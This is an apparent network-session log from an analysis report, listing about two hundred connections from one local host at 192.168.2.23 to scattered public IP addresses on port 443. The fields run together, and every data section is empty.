                                                14376192.168.2.2360432104.13.100.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14377192.168.2.2356650126.176.23.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14378192.168.2.2341092201.107.165.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14379192.168.2.2339578120.158.81.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14380192.168.2.2336662201.241.88.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14381192.168.2.2350914207.102.231.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14382192.168.2.234699460.171.203.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14383192.168.2.234153086.224.123.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14384192.168.2.2347148209.43.191.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14385192.168.2.234601088.51.117.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14386192.168.2.2346068148.231.243.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14387192.168.2.2351316181.79.158.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14388192.168.2.2354764217.43.170.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14389192.168.2.235763461.211.0.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14390192.168.2.23519464.85.196.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14391192.168.2.2347352187.72.105.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14392192.168.2.2360906125.252.122.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14393192.168.2.235625219.52.63.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14394192.168.2.2350614129.177.103.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14395192.168.2.2334998140.3.163.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14396192.168.2.2356708115.5.84.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14397192.168.2.2352048106.99.90.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14398192.168.2.2348374132.82.211.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14399192.168.2.2340816164.173.18.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14400192.168.2.234275497.40.16.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14401192.168.2.2345544155.201.87.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14402192.168.2.233862661.76.65.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14403192.168.2.2350874116.108.72.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14404192.168.2.234465042.202.106.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14405192.168.2.2352638129.101.79.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14406192.168.2.234004258.126.207.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14407192.168.2.2350264125.209.239.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14408192.168.2.235406624.124.184.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14409192.168.2.234263051.37.227.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14410192.168.2.235255479.40.45.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14411192.168.2.235239059.44.226.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14412192.168.2.2334202162.174.200.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14413192.168.2.2358612179.54.145.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14414192.168.2.2356022132.114.17.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14415192.168.2.234119464.27.212.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14416192.168.2.234923636.87.20.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14417192.168.2.234924098.7.129.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14418192.168.2.2342184169.238.199.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14419192.168.2.2345096168.248.7.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14420192.168.2.2339214124.207.164.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14421192.168.2.234841251.105.13.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14422192.168.2.233705895.252.211.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14423192.168.2.234539063.157.123.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14424192.168.2.2338152202.98.244.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14425192.168.2.2348358170.80.86.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14426192.168.2.235641491.174.172.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14427192.168.2.234497062.133.203.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14428192.168.2.2347478169.158.54.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14429192.168.2.233451266.189.190.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14430192.168.2.2344988217.61.67.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14431192.168.2.2347758150.34.198.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14432192.168.2.2334182137.177.106.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14433192.168.2.2360286195.62.83.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14434192.168.2.2350966168.143.164.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14435192.168.2.2338930122.111.170.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14436192.168.2.235143660.250.167.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14437192.168.2.235758674.180.138.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14438192.168.2.2333534169.152.117.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14439192.168.2.2333710114.151.134.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14440192.168.2.2347496160.119.122.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14441192.168.2.2354362102.129.116.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14442192.168.2.2336688194.118.223.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14443192.168.2.235026835.4.180.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14444192.168.2.235978852.107.194.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14445192.168.2.2342700139.249.3.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14446192.168.2.235519092.29.93.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14447192.168.2.2355474182.198.209.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14448192.168.2.2335954187.244.60.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14449192.168.2.2356050161.232.51.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14450192.168.2.2353480155.195.20.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14451192.168.2.2353734139.245.228.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14452192.168.2.235837486.98.216.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14453192.168.2.235499623.154.178.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14454192.168.2.2342140114.102.28.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14455192.168.2.2348472211.188.54.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14456192.168.2.2337960109.91.153.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14457192.168.2.2353532176.40.37.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14458192.168.2.2333988133.220.12.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14459192.168.2.2340776101.22.109.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14460192.168.2.2357958112.82.231.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14461192.168.2.2334592187.221.52.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14462192.168.2.2353010175.124.75.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14463192.168.2.233762436.254.10.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14464192.168.2.235980266.108.123.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14465192.168.2.2335240160.68.165.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14466192.168.2.234059041.16.25.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14467192.168.2.234973082.105.18.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14468192.168.2.2345534129.207.176.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14469192.168.2.2339924184.202.37.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14470192.168.2.2348450180.16.249.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14471192.168.2.2356276223.80.186.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14472192.168.2.233675441.152.132.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14473192.168.2.2350024166.34.35.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14474192.168.2.234969098.242.150.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14475192.168.2.233825053.95.123.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14476192.168.2.234486480.175.184.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14477192.168.2.2358380132.172.152.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14478192.168.2.2347654152.44.209.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14479192.168.2.2347820164.74.88.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14480192.168.2.2346676118.113.65.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14481192.168.2.235031878.215.125.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14482192.168.2.2341092213.113.43.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14483192.168.2.234537038.65.240.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14484192.168.2.2347104177.36.224.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14485192.168.2.235286835.28.65.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14486192.168.2.2350976175.110.18.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14487192.168.2.2345996219.114.22.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14488192.168.2.233414231.37.5.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14489192.168.2.233337247.107.229.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14490192.168.2.2360460120.134.38.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14491192.168.2.2342166178.83.119.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14492192.168.2.2348610137.13.113.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14493192.168.2.235135695.86.189.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14494192.168.2.2335344188.52.56.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14495192.168.2.235611657.28.2.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14496192.168.2.2334854140.39.71.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14497192.168.2.235004672.134.64.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14498192.168.2.2348232201.64.154.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14499192.168.2.2360126118.6.164.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14500192.168.2.2346994117.127.41.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14501192.168.2.234156659.21.233.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14502192.168.2.2336232191.115.195.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14503192.168.2.234389650.244.184.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14504192.168.2.235259632.204.26.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14505192.168.2.2348318102.182.7.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14506192.168.2.234438885.168.160.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14507192.168.2.234368689.190.123.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14508192.168.2.2334616119.125.181.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14509192.168.2.2343524144.151.218.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14510192.168.2.2353048135.77.187.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14511192.168.2.234610460.243.166.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14512192.168.2.2334250101.179.2.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14513192.168.2.235873017.12.196.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14514192.168.2.234836680.68.27.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14515192.168.2.234980496.51.89.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14516192.168.2.234719218.13.50.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14517192.168.2.2339438198.209.245.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14518192.168.2.2350482203.240.58.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14519192.168.2.2335288204.198.4.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14520192.168.2.233516697.234.190.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14521192.168.2.2360142211.189.2.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14522192.168.2.2338942120.6.202.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14523192.168.2.2346856182.153.255.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14524192.168.2.233883475.224.171.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14525192.168.2.2351604200.0.2.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14526192.168.2.2348678196.0.132.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14527192.168.2.2357374158.210.85.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14528192.168.2.2355088206.1.48.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14529192.168.2.2333354219.23.40.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14530192.168.2.2335134181.4.241.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14531192.168.2.2350442184.119.9.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14532192.168.2.235556813.63.88.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14533192.168.2.2348390111.34.149.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14534192.168.2.2355006213.98.80.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14535192.168.2.2359298153.149.163.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14536192.168.2.234332854.186.245.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14537192.168.2.234831239.214.167.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14538192.168.2.2355024145.22.230.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14539192.168.2.2349934159.1.9.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14540192.168.2.2358298150.183.101.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14541192.168.2.234206088.140.156.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14542192.168.2.2345564176.215.42.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14543192.168.2.2357436179.186.192.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14544192.168.2.2344320191.183.135.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14545192.168.2.2353616221.245.229.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14546192.168.2.2343912102.38.163.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14547192.168.2.234207074.155.173.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14548192.168.2.2348000177.36.141.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14549192.168.2.235965881.159.132.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14550192.168.2.235053454.126.215.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14551192.168.2.2337612104.14.185.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14552192.168.2.2344782165.114.122.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14553192.168.2.2354844124.28.91.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14554192.168.2.2350476185.90.72.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14555192.168.2.2353706141.114.136.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14556192.168.2.234081494.105.49.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14557192.168.2.233510295.196.156.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14558192.168.2.234433278.101.231.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14559192.168.2.2335072209.180.158.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14560192.168.2.2345382154.122.18.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14561192.168.2.234725638.108.177.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14562192.168.2.233556681.127.129.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14563192.168.2.2336164118.123.132.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14564192.168.2.2341798158.251.253.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14565192.168.2.235842451.93.27.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14566192.168.2.2352978131.232.13.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14567192.168.2.235863866.138.160.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14568192.168.2.2340626110.240.168.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14569192.168.2.2349812219.150.5.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14570192.168.2.2356470178.219.57.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14571192.168.2.2345906102.97.33.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14572192.168.2.235008238.224.48.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14573192.168.2.2334202163.3.55.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14574192.168.2.233911680.197.200.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14575192.168.2.2350542151.243.5.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14576192.168.2.234645288.5.207.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14577192.168.2.2354924125.87.72.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14578192.168.2.234882627.119.15.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14579192.168.2.2345472197.251.97.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14580192.168.2.2354572136.13.56.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14581192.168.2.2348446152.208.130.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14582192.168.2.2342334187.224.229.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14583192.168.2.234067850.147.175.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14584192.168.2.235797632.148.185.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14585192.168.2.2350754115.235.89.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14586192.168.2.235325076.110.60.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14587192.168.2.2356118202.9.89.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14588192.168.2.2341098192.238.255.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14589192.168.2.234632481.17.55.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14590192.168.2.2349042181.216.77.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14591192.168.2.2359672196.105.6.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14592192.168.2.2333364176.68.186.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14593192.168.2.235459820.95.254.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14594192.168.2.2333906160.243.17.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14595192.168.2.2347296180.112.228.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14596192.168.2.2353342213.182.63.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14597192.168.2.234055258.8.206.110443
                                                TimestampBytes transferredDirectionData


